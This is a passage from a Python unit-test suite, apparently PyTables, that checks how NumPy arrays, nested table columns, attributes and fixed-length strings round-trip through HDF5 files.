b = dset.read()
if not allequal(a, b, "numpy") and common.verbose:
print("Array a original. Shape: ==>", a.shape)
print("Array a original. Data: ==>", a)
print("Info from dataset:", dset._v_pathname)
print(" shape ==>", dset.shape, end=' ')
print(" dtype ==> %s" % dset.dtype)
print("Array b read from file. Shape: ==>", b.shape, end=' ')
print(". Type ==> %s" % b.dtype.char)
self.assertEqual(a.shape, b.shape)
if np.dtype('l').itemsize == 4:
if (a.dtype.char == "i" or a.dtype.char == "l"):
# Special expection. We have no way to distinguish between
# "l" and "i" typecode, and we can consider them the same
# to all practical effects
self.assertTrue(b.dtype.char == "l" or b.dtype.char == "i")
elif (a.dtype.char == "I" or a.dtype.char == "L"):
# Special expection. We have no way to distinguish between
# "L" and "I" typecode, and we can consider them the same
# to all practical effects
self.assertTrue(b.dtype.char == "L" or b.dtype.char == "I")
else:
self.assertTrue(allequal(a, b, "numpy"))
elif np.dtype('l').itemsize == 8:
if (a.dtype.char == "q" or a.dtype.char == "l"):
# Special expection. We have no way to distinguish between
# "q" and "l" typecode in 64-bit platforms, and we can
# consider them the same to all practical effects
self.assertTrue(b.dtype.char == "l" or b.dtype.char == "q")
elif (a.dtype.char == "Q" or a.dtype.char == "L"):
# Special expection. We have no way to distinguish between
# "Q" and "L" typecode in 64-bit platforms, and we can
# consider them the same to all practical effects
self.assertTrue(b.dtype.char == "L" or b.dtype.char == "Q")
else:
self.assertTrue(allequal(a, b, "numpy"))
# Iterate over the next group
group = getattr(group, 'group' + str(i))
def test01_largeRankArrays(self):
"""Checking creation of large rank arrays (0 < rank <= 32)
It also uses arrays ranks which ranges until maxrank.
"""
# maximum level of recursivity (deepest group level) achieved:
# maxrank = 32 (for a effective maximum rank of 32)
# This limit is due to a limit in the HDF5 library.
minrank = 1
maxrank = 32
if common.verbose:
print('\n', '-=' * 30)
print("Running %s.test01_largeRankArrays..." %
self.__class__.__name__)
print("Maximum rank for tested arrays:", maxrank)
group = self.h5file.root
if common.verbose:
print("Rank array writing progress: ", end=' ')
for rank in range(minrank, maxrank + 1):
# Create an array of integers, with incrementally bigger ranges
a = np.ones((1,) * rank, 'i')
if common.verbose:
print("%3d," % (rank), end=' ')
self.h5file.create_array(group, "array", a, "Rank: %s" % rank)
group = self.h5file.create_group(group, 'group' + str(rank))
# Flush the buffers
self.h5file.flush()
self._reopen()
group = self.h5file.root
if common.verbose:
print()
print("Rank array reading progress: ")
# Get the metadata on the previosly saved arrays
for rank in range(minrank, maxrank + 1):
# Create an array for later comparison
a = np.ones((1,) * rank, 'i')
# Get the actual array
b = group.array.read()
if common.verbose:
print("%3d," % (rank), end=' ')
if not a.tolist() == b.tolist() and common.verbose:
dset = group.array
print("Info from dataset:", dset._v_pathname)
print(" Shape: ==>", dset.shape, end=' ')
print(" typecode ==> %c" % dset.typecode)
print("Array b read from file. Shape: ==>", b.shape, end=' ')
print(". Type ==> %c" % b.dtype.char)
self.assertEqual(a.shape, b.shape)
if a.dtype.char == "i":
# Special expection. We have no way to distinguish between
# "l" and "i" typecode, and we can consider them the same
# to all practical effects
self.assertTrue(b.dtype.char == "l" or b.dtype.char == "i")
else:
self.assertEqual(a.dtype.char, b.dtype.char)
self.assertEqual(a, b)
# Iterate over the next group
group = self.h5file.get_node(group, 'group' + str(rank))
if common.verbose:
print() # This flush the stdout buffer
# Test Record class
class Record(tables.IsDescription):
var1 = StringCol(itemsize=4, dflt=b"abcd", pos=0)
var2 = StringCol(itemsize=1, dflt=b"a", pos=1)
var3 = BoolCol(dflt=1)
var4 = Int8Col(dflt=1)
var5 = UInt8Col(dflt=1)
var6 = Int16Col(dflt=1)
var7 = UInt16Col(dflt=1)
var8 = Int32Col(dflt=1)
var9 = UInt32Col(dflt=1)
var10 = Int64Col(dflt=1)
var11 = Float32Col(dflt=1.0)
var12 = Float64Col(dflt=1.0)
var13 = ComplexCol(itemsize=8, dflt=(1.+0.j))
var14 = ComplexCol(itemsize=16, dflt=(1.+0.j))
if hasattr(tables, 'Float16Col'):
var15 = tables.Float16Col(dflt=1.0)
if hasattr(tables, 'Float96Col'):
var16 = tables.Float96Col(dflt=1.0)
if hasattr(tables, 'Float128Col'):
var17 = tables.Float128Col(dflt=1.0)
if hasattr(tables, 'Complex196Col'):
var18 = tables.ComplexCol(itemsize=24, dflt=(1.+0.j))
if hasattr(tables, 'Complex256Col'):
var19 = tables.ComplexCol(itemsize=32, dflt=(1.+0.j))
class TableReadTestCase(common.TempFileMixin, TestCase):
nrows = 100
def setUp(self):
super(TableReadTestCase, self).setUp()
# Create an instance of an HDF5 Table
table = self.h5file.create_table(self.h5file.root, 'table', Record)
for i in range(self.nrows):
table.row.append() # Fill 100 rows with default values
self._reopen(mode='a')
def test01_readTableChar(self):
"""Checking column conversion into NumPy in read().
Char flavor
"""
table = self.h5file.root.table
table.flavor = "numpy"
for colname in table.colnames:
numcol = table.read(field=colname)
typecol = table.coltypes[colname]
itemsizecol = table.description._v_dtypes[colname].base.itemsize
nctypecode = numcol.dtype.char
if typecol == "string":
if itemsizecol > 1:
orignumcol = np.array(['abcd']*self.nrows, dtype='S4')
else:
orignumcol = np.array(['a']*self.nrows, dtype='S1')
if common.verbose:
print("Typecode of NumPy column read:", nctypecode)
print("Should look like:", 'c')
print("Itemsize of column:", itemsizecol)
print("Shape of NumPy column read:", numcol.shape)
print("Should look like:", orignumcol.shape)
print("First 3 elements of read col:", numcol[:3])
# Check that both NumPy objects are equal
self.assertTrue(allequal(numcol, orignumcol, "numpy"))
def test01_readTableNum(self):
"""Checking column conversion into NumPy in read().
NumPy flavor
"""
table = self.h5file.root.table
table.flavor = "numpy"
for colname in table.colnames:
numcol = table.read(field=colname)
typecol = table.coltypes[colname]
nctypecode = np.typeNA[numcol.dtype.char[0]]
if typecol != "string":
if common.verbose:
print("Typecode of NumPy column read:", nctypecode)
print("Should look like:", typecol)
orignumcol = np.ones(shape=self.nrows, dtype=numcol.dtype.char)
# Check that both NumPy objects are equal
self.assertTrue(allequal(numcol, orignumcol, "numpy"))
def test02_readCoordsChar(self):
"""Column conversion into NumPy in readCoords().
Chars
"""
table = self.h5file.root.table
table.flavor = "numpy"
coords = [1, 2, 3]
self.nrows = len(coords)
for colname in table.colnames:
numcol = table.read_coordinates(coords, field=colname)
typecol = table.coltypes[colname]
itemsizecol = table.description._v_dtypes[colname].base.itemsize
nctypecode = numcol.dtype.char
if typecol == "string":
if itemsizecol > 1:
orignumcol = np.array(['abcd']*self.nrows, dtype='S4')
else:
orignumcol = np.array(['a']*self.nrows, dtype='S1')
if common.verbose:
print("Typecode of NumPy column read:", nctypecode)
print("Should look like:", 'c')
print("Itemsize of column:", itemsizecol)
print("Shape of NumPy column read:", numcol.shape)
print("Should look like:", orignumcol.shape)
print("First 3 elements of read col:", numcol[:3])
# Check that both NumPy objects are equal
self.assertTrue(allequal(numcol, orignumcol, "numpy"))
def test02_readCoordsNum(self):
"""Column conversion into NumPy in read_coordinates().
NumPy.
"""
table = self.h5file.root.table
table.flavor = "numpy"
coords = [1, 2, 3]
self.nrows = len(coords)
for colname in table.colnames:
numcol = table.read_coordinates(coords, field=colname)
typecol = table.coltypes[colname]
type_ = numcol.dtype.type
if typecol != "string":
if typecol == "int64":
return
if common.verbose:
print("Type of read NumPy column:", type_)
print("Should look like:", typecol)
orignumcol = np.ones(shape=self.nrows, dtype=numcol.dtype.char)
# Check that both NumPy objects are equal
self.assertTrue(allequal(numcol, orignumcol, "numpy"))
def test03_getIndexNumPy(self):
"""Getting table rows specifyied as NumPy scalar integers."""
table = self.h5file.root.table
coords = np.array([1, 2, 3], dtype='int8')
for colname in table.colnames:
numcol = [table[coord][colname] for coord in coords]
typecol = table.coltypes[colname]
if typecol != "string":
if typecol == "int64":
return
numcol = np.array(numcol, typecol)
if common.verbose:
type_ = numcol.dtype.type
print("Type of read NumPy column:", type_)
print("Should look like:", typecol)
orignumcol = np.ones(shape=len(numcol),
dtype=numcol.dtype.char)
# Check that both NumPy objects are equal
self.assertTrue(allequal(numcol, orignumcol, "numpy"))
def test04_setIndexNumPy(self):
"""Setting table rows specifyied as NumPy integers."""
self._reopen(mode='a')
table = self.h5file.root.table
table.flavor = "numpy"
coords = np.array([1, 2, 3], dtype='int8')
# Modify row 1
# From PyTables 2.0 on, assignments to records can be done
# only as tuples (see http://projects.scipy.org/scipy/numpy/ticket/315)
# table[coords[0]] = ["aasa","x"]+[232]*12
n = len(Record.columns) - 2
table[coords[0]] = tuple(["aasa", "x"]+[232]*n) # XXX
# record = list(table[coords[0]])
record = table.read(coords[0], coords[0] + 1)
if common.verbose:
print("Original row:\n"
"['aasa', 'x', True, -24, 232, 232, 232, 232, 232L, "
"232, 232.0, 232.0, (232 + 0j), (232+0j), 232.0, "
"(232+0j)]\n")
print("Read row:\n", record)
self.assertEqual(record['var1'], b'aasa')
self.assertEqual(record['var2'], b'x')
self.assertEqual(record['var3'], True)
self.assertEqual(record['var4'], -24)
self.assertEqual(record['var7'], 232)
# The declaration of the nested table:
class Info(tables.IsDescription):
_v_pos = 3
Name = StringCol(itemsize=2)
Value = ComplexCol(itemsize=16)
class TestTDescr(tables.IsDescription):
"""A description that has several nested columns."""
x = Int32Col(dflt=0, shape=2, pos=0) # 0
y = FloatCol(dflt=1, shape=(2, 2))
z = UInt8Col(dflt=1)
z3 = EnumCol({'r': 4, 'g': 2, 'b': 1}, 'r', 'int32', shape=2)
color = StringCol(itemsize=4, dflt=b"ab", pos=2)
info = Info()
class Info(tables.IsDescription): # 1
_v_pos = 1
name = StringCol(itemsize=2)
value = ComplexCol(itemsize=16, pos=0) # 0
y2 = FloatCol(pos=1) # 1
z2 = UInt8Col()
class Info2(tables.IsDescription):
y3 = Time64Col(shape=2)
name = StringCol(itemsize=2)
value = ComplexCol(itemsize=16, shape=2)
class TableNativeFlavorTestCase(common.TempFileMixin, TestCase):
nrows = 100
def setUp(self):
super(TableNativeFlavorTestCase, self).setUp()
# Create an instance of an HDF5 Table
table = self.h5file.create_table(self.h5file.root, 'table', TestTDescr,
expectedrows=self.nrows)
table.flavor = "numpy"
for i in range(self.nrows):
table.row.append() # Fill 100 rows with default values
table.flush()
def test01a_basicTableRead(self):
"""Checking the return of a NumPy in read()."""
if self.close:
self._reopen(mode='a')
table = self.h5file.root.table
data = table[:]
if common.verbose:
print("Type of read:", type(data))
print("Description of the record:", data.dtype.descr)
print("First 3 elements of read:", data[:3])
# Check that both NumPy objects are equal
self.assertTrue(isinstance(data, np.ndarray))
# Check the value of some columns
# A flat column
col = table.cols.x[:3]
self.assertTrue(isinstance(col, np.ndarray))
npcol = np.zeros((3, 2), dtype="int32")
self.assertTrue(allequal(col, npcol, "numpy"))
# A nested column
col = table.cols.Info[:3]
self.assertTrue(isinstance(col, np.ndarray))
dtype = [('value', 'c16'),
('y2', 'f8'),
('Info2',
[('name', 'S2'),
('value', 'c16', (2,)),
('y3', 'f8', (2,))]),
('name', 'S2'),
('z2', 'u1')]
npcol = np.zeros((3,), dtype=dtype)
self.assertEqual(col.dtype.descr, npcol.dtype.descr)
if common.verbose:
print("col-->", col)
print("npcol-->", npcol)
# A copy() is needed in case the buffer can be in different segments
self.assertEqual(bytes(col.copy().data), bytes(npcol.data))
def test01b_basicTableRead(self):
"""Checking the return of a NumPy in read() (strided version)."""
if self.close:
self._reopen(mode='a')
table = self.h5file.root.table
data = table[::3]
if common.verbose:
print("Type of read:", type(data))
print("Description of the record:", data.dtype.descr)
print("First 3 elements of read:", data[:3])
# Check that both NumPy objects are equal
self.assertTrue(isinstance(data, np.ndarray))
# Check the value of some columns
# A flat column
col = table.cols.x[:9:3]
self.assertTrue(isinstance(col, np.ndarray))
npcol = np.zeros((3, 2), dtype="int32")
self.assertTrue(allequal(col, npcol, "numpy"))
# A nested column
col = table.cols.Info[:9:3]
self.assertTrue(isinstance(col, np.ndarray))
dtype = [('value', '%sc16' % byteorder),
('y2', '%sf8' % byteorder),
('Info2',
[('name', '|S2'),
('value', '%sc16' % byteorder, (2,)),
('y3', '%sf8' % byteorder, (2,))]),
('name', '|S2'),
('z2', '|u1')]
npcol = np.zeros((3,), dtype=dtype)
self.assertEqual(col.dtype.descr, npcol.dtype.descr)
if common.verbose:
print("col-->", col)
print("npcol-->", npcol)
# A copy() is needed in case the buffer can be in different segments
self.assertEqual(bytes(col.copy().data), bytes(npcol.data))
def test02_getWhereList(self):
"""Checking the return of NumPy in get_where_list method."""
if self.close:
self._reopen(mode='a')
table = self.h5file.root.table
data = table.get_where_list('z == 1')
if common.verbose:
print("Type of read:", type(data))
print("Description of the record:", data.dtype.descr)
print("First 3 elements of read:", data[:3])
# Check that both NumPy objects are equal
self.assertTrue(isinstance(data, np.ndarray))
# Check that all columns have been selected
self.assertEqual(len(data), 100)
# Finally, check that the contents are ok
self.assertTrue(allequal(data, np.arange(100, dtype="i8"), "numpy"))
def test03a_readWhere(self):
"""Checking the return of NumPy in read_where method (strings)."""
table = self.h5file.root.table
table.cols.color.create_index()
if self.close:
self._reopen(mode='a')
table = self.h5file.root.table
data = table.read_where('color == b"ab"')
if common.verbose:
print("Type of read:", type(data))
print("Length of the data read:", len(data))
# Check that both NumPy objects are equal
self.assertTrue(isinstance(data, np.ndarray))
# Check that all columns have been selected
self.assertEqual(len(data), self.nrows)
def test03b_readWhere(self):
"""Checking the return of NumPy in read_where method (numeric)."""
table = self.h5file.root.table
table.cols.z.create_index()
if self.close:
self._reopen(mode='a')
table = self.h5file.root.table
data = table.read_where('z == 0')
if common.verbose:
print("Type of read:", type(data))
print("Length of the data read:", len(data))
# Check that both NumPy objects are equal
self.assertTrue(isinstance(data, np.ndarray))
# Check that all columns have been selected
self.assertEqual(len(data), 0)
def test04a_createTable(self):
"""Checking the Table creation from a numpy recarray."""
dtype = [('value', '%sc16' % byteorder),
('y2', '%sf8' % byteorder),
('Info2',
[('name', '|S2'),
('value', '%sc16' % byteorder, (2,)),
('y3', '%sf8' % byteorder, (2,))]),
('name', '|S2'),
('z2', '|u1')]
npdata = np.zeros((3,), dtype=dtype)
table = self.h5file.create_table(self.h5file.root, 'table2', npdata)
if self.close:
self._reopen(mode='a')
table = self.h5file.root.table2
data = table[:]
if common.verbose:
print("Type of read:", type(data))
print("Description of the record:", data.dtype.descr)
print("First 3 elements of read:", data[:3])
print("Length of the data read:", len(data))
# Check that both NumPy objects are equal
self.assertTrue(isinstance(data, np.ndarray))
# Check the type
self.assertEqual(data.dtype.descr, npdata.dtype.descr)
if common.verbose:
print("npdata-->", npdata)
print("data-->", data)
# A copy() is needed in case the buffer would be in different segments
self.assertEqual(bytes(data.copy().data), bytes(npdata.data))
def test04b_appendTable(self):
"""Checking appending a numpy recarray."""
table = self.h5file.root.table
npdata = table[3:6]
table.append(npdata)
if self.close:
self._reopen(mode='a')
table = self.h5file.root.table
data = table[-3:]
if common.verbose:
print("Type of read:", type(data))
print("Description of the record:", data.dtype.descr)
print("Last 3 elements of read:", data[-3:])
print("Length of the data read:", len(data))
# Check that both NumPy objects are equal
self.assertTrue(isinstance(data, np.ndarray))
# Check the type
self.assertEqual(data.dtype.descr, npdata.dtype.descr)
if common.verbose:
print("npdata-->", npdata)
print("data-->", data)
# A copy() is needed in case the buffer would be in different segments
self.assertEqual(bytes(data.copy().data), bytes(npdata.data))
def test05a_assignColumn(self):
"""Checking assigning to a column."""
table = self.h5file.root.table
table.cols.z[:] = np.zeros((100,), dtype='u1')
if self.close:
self._reopen(mode='a')
table = self.h5file.root.table
data = table.cols.z[:]
if common.verbose:
print("Type of read:", type(data))
print("Description of the record:", data.dtype.descr)
print("First 3 elements of read:", data[:3])
print("Length of the data read:", len(data))
# Check that both NumPy objects are equal
self.assertTrue(isinstance(data, np.ndarray))
# Check that all columns have been selected
self.assertEqual(len(data), 100)
# Finally, check that the contents are ok
self.assertTrue(allequal(data, np.zeros((100,), dtype="u1"), "numpy"))
def test05b_modifyingColumns(self):
"""Checking modifying several columns at once."""
table = self.h5file.root.table
xcol = np.ones((3, 2), 'int32')
ycol = np.zeros((3, 2, 2), 'float64')
zcol = np.zeros((3,), 'uint8')
table.modify_columns(3, 6, 1, [xcol, ycol, zcol], ['x', 'y', 'z'])
if self.close:
self._reopen(mode='a')
table = self.h5file.root.table
data = table.cols.y[3:6]
if common.verbose:
print("Type of read:", type(data))
print("Description of the record:", data.dtype.descr)
print("First 3 elements of read:", data[:3])
print("Length of the data read:", len(data))
# Check that both NumPy objects are equal
self.assertTrue(isinstance(data, np.ndarray))
# Check the type
self.assertEqual(data.dtype.descr, ycol.dtype.descr)
if common.verbose:
print("ycol-->", ycol)
print("data-->", data)
# A copy() is needed in case the buffer would be in different segments
self.assertEqual(data.copy().data, ycol.data)
def test05c_modifyingColumns(self):
"""Checking modifying several columns using a single numpy buffer."""
table = self.h5file.root.table
dtype = [('x', 'i4', (2,)), ('y', 'f8', (2, 2)), ('z', 'u1')]
nparray = np.zeros((3,), dtype=dtype)
table.modify_columns(3, 6, 1, nparray, ['x', 'y', 'z'])
if self.close:
self._reopen(mode='a')
table = self.h5file.root.table
ycol = np.zeros((3, 2, 2), 'float64')
data = table.cols.y[3:6]
if common.verbose:
print("Type of read:", type(data))
print("Description of the record:", data.dtype.descr)
print("First 3 elements of read:", data[:3])
print("Length of the data read:", len(data))
# Check that both NumPy objects are equal
self.assertTrue(isinstance(data, np.ndarray))
# Check the type
self.assertEqual(data.dtype.descr, ycol.dtype.descr)
if common.verbose:
print("ycol-->", ycol)
print("data-->", data)
# A copy() is needed in case the buffer would be in different segments
self.assertEqual(data.copy().data, ycol.data)
def test06a_assignNestedColumn(self):
"""Checking assigning a nested column (using modify_column)."""
table = self.h5file.root.table
dtype = [('value', '%sc16' % byteorder),
('y2', '%sf8' % byteorder),
('Info2',
[('name', '|S2'),
('value', '%sc16' % byteorder, (2,)),
('y3', '%sf8' % byteorder, (2,))]),
('name', '|S2'),
('z2', '|u1')]
npdata = np.zeros((3,), dtype=dtype)
data = table.cols.Info[3:6]
table.modify_column(3, 6, 1, column=npdata, colname='Info')
if self.close:
self._reopen(mode='a')
table = self.h5file.root.table
data = table.cols.Info[3:6]
if common.verbose:
print("Type of read:", type(data))
print("Description of the record:", data.dtype.descr)
print("First 3 elements of read:", data[:3])
print("Length of the data read:", len(data))
# Check that both NumPy objects are equal
self.assertTrue(isinstance(data, np.ndarray))
# Check the type
self.assertEqual(data.dtype.descr, npdata.dtype.descr)
if common.verbose:
print("npdata-->", npdata)
print("data-->", data)
# A copy() is needed in case the buffer would be in different segments
self.assertEqual(bytes(data.copy().data), bytes(npdata.data))
def test06b_assignNestedColumn(self):
"""Checking assigning a nested column (using the .cols accessor)."""
table = self.h5file.root.table
dtype = [('value', '%sc16' % byteorder),
('y2', '%sf8' % byteorder),
('Info2',
[('name', '|S2'),
('value', '%sc16' % byteorder, (2,)),
('y3', '%sf8' % byteorder, (2,))]),
('name', '|S2'),
('z2', '|u1')]
npdata = np.zeros((3,), dtype=dtype)
#self.assertRaises(NotImplementedError,
# table.cols.Info.__setitem__, slice(3,6,1), npdata)
table.cols.Info[3:6] = npdata
if self.close:
self._reopen(mode='a')
table = self.h5file.root.table
data = table.cols.Info[3:6]
if common.verbose:
print("Type of read:", type(data))
print("Description of the record:", data.dtype.descr)
print("First 3 elements of read:", data[:3])
print("Length of the data read:", len(data))
# Check that both NumPy objects are equal
self.assertTrue(isinstance(data, np.ndarray))
# Check the type
self.assertEqual(data.dtype.descr, npdata.dtype.descr)
if common.verbose:
print("npdata-->", npdata)
print("data-->", data)
# A copy() is needed in case the buffer would be in different segments
self.assertEqual(bytes(data.copy().data), bytes(npdata.data))
def test07a_modifyingRows(self):
"""Checking modifying several rows at once (using modify_rows)."""
table = self.h5file.root.table
# Read a chunk of the table
chunk = table[0:3]
# Modify it somewhat
chunk['y'][:] = -1
table.modify_rows(3, 6, 1, rows=chunk)
if self.close:
self._reopen(mode='a')
table = self.h5file.root.table
ycol = np.zeros((3, 2, 2), 'float64')-1
data = table.cols.y[3:6]
if common.verbose:
print("Type of read:", type(data))
print("Description of the record:", data.dtype.descr)
print("First 3 elements of read:", data[:3])
print("Length of the data read:", len(data))
# Check that both NumPy objects are equal
self.assertTrue(isinstance(data, np.ndarray))
# Check the type
self.assertEqual(data.dtype.descr, ycol.dtype.descr)
if common.verbose:
print("ycol-->", ycol)
print("data-->", data)
self.assertTrue(allequal(ycol, data, "numpy"))
def test07b_modifyingRows(self):
"""Checking modifying several rows at once (using cols accessor)."""
table = self.h5file.root.table
# Read a chunk of the table
chunk = table[0:3]
# Modify it somewhat
chunk['y'][:] = -1
table.cols[3:6] = chunk
if self.close:
self._reopen(mode='a')
table = self.h5file.root.table
# Check that some column has been actually modified
ycol = np.zeros((3, 2, 2), 'float64')-1
data = table.cols.y[3:6]
if common.verbose:
print("Type of read:", type(data))
print("Description of the record:", data.dtype.descr)
print("First 3 elements of read:", data[:3])
print("Length of the data read:", len(data))
# Check that both NumPy objects are equal
self.assertTrue(isinstance(data, np.ndarray))
# Check the type
self.assertEqual(data.dtype.descr, ycol.dtype.descr)
if common.verbose:
print("ycol-->", ycol)
print("data-->", data)
self.assertTrue(allequal(ycol, data, "numpy"))
def test08a_modifyingRows(self):
"""Checking modifying just one row at once (using modify_rows)."""
table = self.h5file.root.table
# Read a chunk of the table
chunk = table[3:4]
# Modify it somewhat
chunk['y'][:] = -1
table.modify_rows(6, 7, 1, chunk)
if self.close:
self._reopen(mode='a')
table = self.h5file.root.table
# Check that some column has been actually modified
ycol = np.zeros((2, 2), 'float64')-1
data = table.cols.y[6]
if common.verbose:
print("Type of read:", type(data))
print("Description of the record:", data.dtype.descr)
print("First 3 elements of read:", data[:3])
print("Length of the data read:", len(data))
# Check that both NumPy objects are equal
self.assertTrue(isinstance(data, np.ndarray))
# Check the type
self.assertEqual(data.dtype.descr, ycol.dtype.descr)
if common.verbose:
print("ycol-->", ycol)
print("data-->", data)
self.assertTrue(allequal(ycol, data, "numpy"))
def test08b_modifyingRows(self):
"""Checking modifying just one row at once (using cols accessor)."""
table = self.h5file.root.table
# Read a chunk of the table
chunk = table[3:4]
# Modify it somewhat
chunk['y'][:] = -1
table.cols[6] = chunk
if self.close:
self._reopen(mode='a')
table = self.h5file.root.table
# Check that some column has been actually modified
ycol = np.zeros((2, 2), 'float64')-1
data = table.cols.y[6]
if common.verbose:
print("Type of read:", type(data))
print("Description of the record:", data.dtype.descr)
print("First 3 elements of read:", data[:3])
print("Length of the data read:", len(data))
# Check that both NumPy objects are equal
self.assertTrue(isinstance(data, np.ndarray))
# Check the type
self.assertEqual(data.dtype.descr, ycol.dtype.descr)
if common.verbose:
print("ycol-->", ycol)
print("data-->", data)
self.assertTrue(allequal(ycol, data, "numpy"))
def test09a_getStrings(self):
"""Checking the return of string columns with spaces."""
if self.close:
self._reopen(mode='a')
table = self.h5file.root.table
rdata = table.get_where_list('color == b"ab"')
data = table.read_coordinates(rdata)
if common.verbose:
print("Type of read:", type(data))
print("Description of the record:", data.dtype.descr)
print("First 3 elements of read:", data[:3])
# Check that both NumPy objects are equal
self.assertTrue(isinstance(data, np.ndarray))
# Check that all columns have been selected
self.assertEqual(len(data), 100)
# Finally, check that the contents are ok
for idata in data['color']:
self.assertEqual(idata, np.array("ab", dtype="|S4"))
def test09b_getStrings(self):
"""Checking the return of string columns with spaces.
(modify)
"""
if self.close:
self._reopen(mode='a')
table = self.h5file.root.table
for i in range(50):
table.cols.color[i] = "a "
table.flush()
data = table[:]
if common.verbose:
print("Type of read:", type(data))
print("Description of the record:", data.dtype.descr)
print("First 3 elements of read:", data[:3])
# Check that both NumPy objects are equal
self.assertTrue(isinstance(data, np.ndarray))
# Check that all columns have been selected
self.assertEqual(len(data), 100)
# Finally, check that the contents are ok
for i in range(100):
idata = data['color'][i]
if i >= 50:
self.assertEqual(idata, np.array("ab", dtype="|S4"))
else:
self.assertEqual(idata, np.array("a ", dtype="|S4"))
def test09c_getStrings(self):
"""Checking the return of string columns with spaces.
(append)
"""
if self.close:
self._reopen(mode='a')
table = self.h5file.root.table
row = table.row
for i in range(50):
row["color"] = "a " # note the trailing spaces
row.append()
table.flush()
if self.close:
self.h5file.close()
self.h5file = tables.open_file(self.h5fname, "a")
data = self.h5file.root.table[:]
if common.verbose:
print("Type of read:", type(data))
print("Description of the record:", data.dtype.descr)
print("First 3 elements of read:", data[:3])
# Check that both NumPy objects are equal
self.assertTrue(isinstance(data, np.ndarray))
# Check that all columns have been selected
self.assertEqual(len(data), 150)
# Finally, check that the contents are ok
for i in range(150):
idata = data['color'][i]
if i < 100:
self.assertEqual(idata, np.array("ab", dtype="|S4"))
else:
self.assertEqual(idata, np.array("a ", dtype="|S4"))
class TableNativeFlavorOpenTestCase(TableNativeFlavorTestCase):
close = 0
class TableNativeFlavorCloseTestCase(TableNativeFlavorTestCase):
close = 1
class AttributesTestCase(common.TempFileMixin, TestCase):
def setUp(self):
super(AttributesTestCase, self).setUp()
# Create an instance of an HDF5 Table
self.h5file.create_group(self.h5file.root, 'group')
def test01_writeAttribute(self):
"""Checking the creation of a numpy attribute."""
group = self.h5file.root.group
g_attrs = group._v_attrs
g_attrs.numpy1 = np.zeros((1, 1), dtype='int16')
if self.close:
self._reopen(mode='a')
group = self.h5file.root.group
g_attrs = group._v_attrs
# Check that we can retrieve a numpy object
data = g_attrs.numpy1
npcomp = np.zeros((1, 1), dtype='int16')
# Check that both NumPy objects are equal
self.assertTrue(isinstance(data, np.ndarray))
# Check the type
self.assertEqual(data.dtype.descr, npcomp.dtype.descr)
if common.verbose:
print("npcomp-->", npcomp)
print("data-->", data)
self.assertTrue(allequal(npcomp, data, "numpy"))
def test02_updateAttribute(self):
"""Checking the modification of a numpy attribute."""
group = self.h5file.root.group
g_attrs = group._v_attrs
g_attrs.numpy1 = np.zeros((1, 2), dtype='int16')
if self.close:
self._reopen(mode='a')
group = self.h5file.root.group
g_attrs = group._v_attrs
# Update this attribute
g_attrs.numpy1 = np.ones((1, 2), dtype='int16')
# Check that we can retrieve a numpy object
data = g_attrs.numpy1
npcomp = np.ones((1, 2), dtype='int16')
# Check that both NumPy objects are equal
self.assertTrue(isinstance(data, np.ndarray))
# Check the type
self.assertEqual(data.dtype.descr, npcomp.dtype.descr)
if common.verbose:
print("npcomp-->", npcomp)
print("data-->", data)
self.assertTrue(allequal(npcomp, data, "numpy"))
class AttributesOpenTestCase(AttributesTestCase):
close = 0
class AttributesCloseTestCase(AttributesTestCase):
close = 1
class StrlenTestCase(common.TempFileMixin, TestCase):
def setUp(self):
super(StrlenTestCase, self).setUp()
# Create an instance of an HDF5 Table
group = self.h5file.create_group(self.h5file.root, 'group')
tablelayout = {'Text': StringCol(itemsize=1000), }
self.table = self.h5file.create_table(group, 'table', tablelayout)
self.table.flavor = 'numpy'
row = self.table.row
row['Text'] = 'Hello Francesc!' # XXX: check unicode --> bytes
row.append()
row['Text'] = 'Hola Francesc!' # XXX: check unicode --> bytes
row.append()
self.table.flush()
def test01(self):
"""Checking the lengths of strings (read field)."""
if self.close:
self._reopen(mode='a')
self.table = self.h5file.root.group.table
# Get both strings
str1 = self.table.col('Text')[0]
str2 = self.table.col('Text')[1]
if common.verbose:
print("string1-->", str1)
print("string2-->", str2)
# Check that both NumPy objects are equal
self.assertEqual(len(str1), len(b'Hello Francesc!'))
self.assertEqual(len(str2), len(b'Hola Francesc!'))
self.assertEqual(str1, b'Hello Francesc!')
self.assertEqual(str2, b'Hola Francesc!')
def test02(self):
"""Checking the lengths of strings (read recarray)."""
if self.close:
self._reopen(mode='a')
self.table = self.h5file.root.group.table
# Get both strings
str1 = self.table[:]['Text'][0]
str2 = self.table[:]['Text'][1]
# Check that both NumPy objects are equal
self.assertEqual(len(str1), len(b'Hello Francesc!'))
self.assertEqual(len(str2), len(b'Hola Francesc!'))
self.assertEqual(str1, b'Hello Francesc!')
self.assertEqual(str2, b'Hola Francesc!')
def test03(self):
"""Checking the lengths of strings (read recarray, row by row)."""
if self.close:
self._reopen(mode='a')
self.table = self.h5file.root.group.table
# Get both strings
str1 = self.table[0]['Text']
str2 = self.table[1]['Text']
# Check that both NumPy objects are equal
self.assertEqual(len(str1), len(b'Hello Francesc!'))
self.assertEqual(len(str2), len(b'Hola Francesc!'))
self.assertEqual(str1, b'Hello Francesc!')
self.assertEqual(str2, b'Hola Francesc!')
class StrlenOpenTestCase(StrlenTestCase):
close = 0
class StrlenCloseTestCase(StrlenTestCase):
close = 1
def suite():
theSuite = unittest.TestSuite()
niter = 1
# theSuite.addTest(unittest.makeSuite(StrlenOpenTestCase))
# theSuite.addTest(unittest.makeSuite(Basic0DOneTestCase))
# theSuite.addTest(unittest.makeSuite(GroupsArrayTestCase))
for i in range(niter):
theSuite.addTest(unittest.makeSuite(Basic0DOneTestCase))
theSuite.addTest(unittest.makeSuite(Basic0DTwoTestCase))
theSuite.addTest(unittest.makeSuite(Basic1DOneTestCase))
theSuite.addTest(unittest.makeSuite(Basic1DTwoTestCase))
theSuite.addTest(unittest.makeSuite(Basic1DThreeTestCase))
theSuite.addTest(unittest.makeSuite(Basic2DTestCase))
theSuite.addTest(unittest.makeSuite(GroupsArrayTestCase))
theSuite.addTest(unittest.makeSuite(TableReadTestCase))
theSuite.addTest(unittest.makeSuite(TableNativeFlavorOpenTestCase))
theSuite.addTest(unittest.makeSuite(TableNativeFlavorCloseTestCase))
theSuite.addTest(unittest.makeSuite(AttributesOpenTestCase))
theSuite.addTest(unittest.makeSuite(AttributesCloseTestCase))
theSuite.addTest(unittest.makeSuite(StrlenOpenTestCase))
theSuite.addTest(unittest.makeSuite(StrlenCloseTestCase))
if common.heavy:
theSuite.addTest(unittest.makeSuite(Basic10DTestCase))
